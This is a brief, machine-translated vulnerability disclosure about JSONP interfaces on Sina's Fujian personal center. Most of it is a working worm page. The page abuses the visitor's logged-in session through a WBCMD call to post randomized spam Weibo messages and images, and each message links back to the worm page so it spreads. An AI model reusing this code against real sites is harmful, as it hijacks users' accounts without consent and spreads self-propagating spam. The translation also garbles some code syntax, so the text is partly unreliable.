Two jsonp interfaces called by Sina's personal center in Fujian can be maliciously exploited to obtain friend information and use cookie hijacking without other authorization to publish spoofing information. Spread like a worm.
Key code:
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> Sample Page </title>
<Script type = "text/javascript" src = "http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js"> </script>
<Script type = "text/javascript" src = "http://fj.sinaimg.cn/utils/API-pack.js"> </script>
<Script type = "text/javascript">
Var content = ['Hey Hey, w ww.2cto.com, we recommend that you listen to @ Wanzi-_-. He wrote this very interesting thing, http://wanz.im/sinaworm.html ',
'I wiped it, @ Wanzi-_-he wrote this thing too awesome, http://wanz.im/sinaworm.html ',
'Ang ~ @ Wanzi-_-he wrote this thing so shy ~, Http://wanz.im/sinaworm.html'],
Pics = ["http://ww1.sinaimg.cn/bmiddle/7e7fc78bgw1ds88rpzhefj.jpg", "http://ww1.sinaimg.cn/bmiddle/7e7fc78bgw1ds88rpzhefj.jpg"],
I = Math. floor (Math. random () * 2 ),
Pic = pics [I],
Success = function (json ){
// Window. location = 'HTTP: // weibo.com/hiwanz ';
},
Failure = function (json ){
// Alert (json. errmsg );
},
Url = "http://common.fj.sina.com.cn/index.php/201205hgktv/weibolottery/publish? Callback =? ";
WBCMD ("post", {content: content [Math. round (Math. random () * 2)], pic: pic, atNum: 1, filter: [], must: [], url: url}, success, failure );
</Script>
</Head>
Proof of vulnerability:
Http://www.weibo.com/2254653223/yloiziEGU